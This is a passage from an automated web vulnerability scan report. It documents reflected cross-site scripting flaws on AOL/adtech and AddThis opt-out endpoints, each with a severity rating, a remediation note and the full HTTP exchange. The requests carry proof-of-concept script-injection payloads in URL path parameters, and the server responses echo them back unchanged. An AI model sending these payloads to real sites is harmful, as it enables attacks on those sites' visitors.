GET /naie0cc1"><script>alert(1)</script>4a6c0eee10d/daa.php?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.glb.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:53:07 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESS0230649152a3c9f1f18360b4f3975e3c=495220e88b0720874eed8978dc2b4672; expires=Tue, 06 Dec 2011 22:26:27 GMT; path=/; domain=.nai.glb.adtechus.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:53:07 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11779

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.glb.adtechus.com/naie0cc1"><script>alert(1)</script>4a6c0eee10d/daa.php?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072" />
...[SNIP]...

2.92. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34c6d"-alert(1)-"e8e3163c655 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai34c6d"-alert(1)-"e8e3163c655/daa.php?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.glb.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:53:11 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESS0230649152a3c9f1f18360b4f3975e3c=e3cfdc6a32b574dda16279aeb468114f; expires=Tue, 06 Dec 2011 22:26:31 GMT; path=/; domain=.nai.glb.adtechus.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:53:11 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai34c6d"-alert(1)-"e8e3163c655/daa.php?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main"
...[SNIP]...

2.93. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1384e"-alert(1)-"1f762867e74 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.php1384e"-alert(1)-"1f762867e74?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.glb.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:53:19 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESS0230649152a3c9f1f18360b4f3975e3c=053c7f8a3b8ef1f080b4c927e845b462; expires=Tue, 06 Dec 2011 22:26:39 GMT; path=/; domain=.nai.glb.adtechus.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:53:19 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
i('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.php1384e"-alert(1)-"1f762867e74?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.
...[SNIP]...

2.94. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3815"><script>alert(1)</script>770d05fb8fc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nai/daa.phpc3815"><script>alert(1)</script>770d05fb8fc?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.glb.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:53:14 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESS0230649152a3c9f1f18360b4f3975e3c=b8f399579ea5cefe2e17f6261724fe33; expires=Tue, 06 Dec 2011 22:26:35 GMT; path=/; domain=.nai.glb.adtechus.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:53:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11779

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.glb.adtechus.com/nai/daa.phpc3815"><script>alert(1)</script>770d05fb8fc?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072" />
...[SNIP]...

2.95. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.tacoda.at.atwola.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c214e"-alert(1)-"1bb47028bb8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /naic214e"-alert(1)-"1bb47028bb8/daa.php?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.tacoda.at.atwola.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: atdemo=a3ZoYXNyYz05O2t2cj01MDA=; ATTACID=a3Z0aWQ9MTdicjEybTFpMGtyOTU=; ANRTT=; TData=50014|50213|53575|53770|53823|56856|57587|58839|60145|60506|60548; N=2:d41d8cd98f00b204e9800998ecf8427e,33d93519227d7fc0c737bf49aa17226a; ATTAC=a3ZzZWc9NTAwMTQ6NTAyMTM6NTM1NzU6NTM3NzA6NTM4MjM6NTY4NTY6NTc1ODc6NTg4Mzk6NjAxNDU6NjA1MDY6NjA1NDg=; eadx=x

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:53:38 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff1422e23387cbaf4b1b30f8d022fce4=3204b371421628b1c583e1d559b086c0; expires=Tue, 06 Dec 2011 22:26:58 GMT; path=/; domain=.nai.tacoda.at.atwola.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:53:38 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/naic214e"-alert(1)-"1bb47028bb8/daa.php?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main"
...[SNIP]...

2.96. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.tacoda.at.atwola.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffa1a"><script>alert(1)</script>3e799e27931 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /naiffa1a"><script>alert(1)</script>3e799e27931/daa.php?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.tacoda.at.atwola.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: atdemo=a3ZoYXNyYz05O2t2cj01MDA=; ATTACID=a3Z0aWQ9MTdicjEybTFpMGtyOTU=; ANRTT=; TData=50014|50213|53575|53770|53823|56856|57587|58839|60145|60506|60548; N=2:d41d8cd98f00b204e9800998ecf8427e,33d93519227d7fc0c737bf49aa17226a; ATTAC=a3ZzZWc9NTAwMTQ6NTAyMTM6NTM1NzU6NTM3NzA6NTM4MjM6NTY4NTY6NTc1ODc6NTg4Mzk6NjAxNDU6NjA1MDY6NjA1NDg=; eadx=x

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:53:34 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff1422e23387cbaf4b1b30f8d022fce4=dcca5c02ef5f817c3aec27ec656d138a; expires=Tue, 06 Dec 2011 22:26:54 GMT; path=/; domain=.nai.tacoda.at.atwola.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:53:34 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.tacoda.at.atwola.com/naiffa1a"><script>alert(1)</script>3e799e27931/daa.php?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072" />
...[SNIP]...

2.97. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.tacoda.at.atwola.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 398af"><script>alert(1)</script>f7e91e85276 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nai/daa.php398af"><script>alert(1)</script>f7e91e85276?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.tacoda.at.atwola.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: atdemo=a3ZoYXNyYz05O2t2cj01MDA=; ATTACID=a3Z0aWQ9MTdicjEybTFpMGtyOTU=; ANRTT=; TData=50014|50213|53575|53770|53823|56856|57587|58839|60145|60506|60548; N=2:d41d8cd98f00b204e9800998ecf8427e,33d93519227d7fc0c737bf49aa17226a; ATTAC=a3ZzZWc9NTAwMTQ6NTAyMTM6NTM1NzU6NTM3NzA6NTM4MjM6NTY4NTY6NTc1ODc6NTg4Mzk6NjAxNDU6NjA1MDY6NjA1NDg=; eadx=x

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:53:40 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff1422e23387cbaf4b1b30f8d022fce4=61cbc2d6180b3e19f9403d9e87783744; expires=Tue, 06 Dec 2011 22:27:00 GMT; path=/; domain=.nai.tacoda.at.atwola.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:53:40 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.tacoda.at.atwola.com/nai/daa.php398af"><script>alert(1)</script>f7e91e85276?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072" />
...[SNIP]...

2.98. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.tacoda.at.atwola.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e830"-alert(1)-"447f641cc69 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.php6e830"-alert(1)-"447f641cc69?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072 HTTP/1.1
Host: nai.tacoda.at.atwola.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: atdemo=a3ZoYXNyYz05O2t2cj01MDA=; ATTACID=a3Z0aWQ9MTdicjEybTFpMGtyOTU=; ANRTT=; TData=50014|50213|53575|53770|53823|56856|57587|58839|60145|60506|60548; N=2:d41d8cd98f00b204e9800998ecf8427e,33d93519227d7fc0c737bf49aa17226a; ATTAC=a3ZzZWc9NTAwMTQ6NTAyMTM6NTM1NzU6NTM3NzA6NTM4MjM6NTY4NTY6NTc1ODc6NTg4Mzk6NjAxNDU6NjA1MDY6NjA1NDg=; eadx=x

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:53:43 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff1422e23387cbaf4b1b30f8d022fce4=fb9aa3fb458dd03411fd90f2d64f1180; expires=Tue, 06 Dec 2011 22:27:03 GMT; path=/; domain=.nai.tacoda.at.atwola.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:53:43 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
i('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.php6e830"-alert(1)-"447f641cc69?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4208072";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.
...[SNIP]...

2.99. http://www.addthis.com/api/nai/optout [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4993"-alert(1)-"936eea0237e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /apid4993"-alert(1)-"936eea0237e/nai/optout?nocache=0.5840976 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uid=0000000000000000; uvc=42|42,27|43,4|44,25|45,4|46

Response

HTTP/1.0 404 Not Found
Date: Sun, 13 Nov 2011 18:53:53 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/apid4993"-alert(1)-"936eea0237e/nai/optout";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

2.100. http://www.addthis.com/api/nai/optout [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8a21e<script>alert(1)</script>4c97488bfa8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api8a21e<script>alert(1)</script>4c97488bfa8/nai/optout?nocache=0.5840976 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uid=0000000000000000; uvc=42|42,27|43,4|44,25|45,4|46

Response

HTTP/1.0 404 Not Found
Date: Sun, 13 Nov 2011 18:53:54 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1413
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>api8a21e<script>alert(1)</script>4c97488bfa8/nai/optout?nocache=0.5840976</strong>
...[SNIP]...

2.101. http://www.addthis.com/api/nai/optout [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5ad8a<script>alert(1)</script>0e6fdb9eb17 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/nai5ad8a<script>alert(1)</script>0e6fdb9eb17/optout?nocache=0.5840976 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uid=0000000000000000; uvc=42|42,27|43,4|44,25|45,4|46

Response

HTTP/1.0 404 Not Found
Date: Sun, 13 Nov 2011 18:53:55 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1413
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>api/nai5ad8a<script>alert(1)</script>0e6fdb9eb17/optout?nocache=0.5840976</strong>
...[SNIP]...

2.102. http://www.addthis.com/api/nai/optout [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d61da"-alert(1)-"b9dc2959915 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/naid61da"-alert(1)-"b9dc2959915/optout?nocache=0.5840976 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uid=0000000000000000; uvc=42|42,27|43,4|44,25|45,4|46

Response

HTTP/1.0 404 Not Found
Date: Sun, 13 Nov 2011 18:53:55 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1387
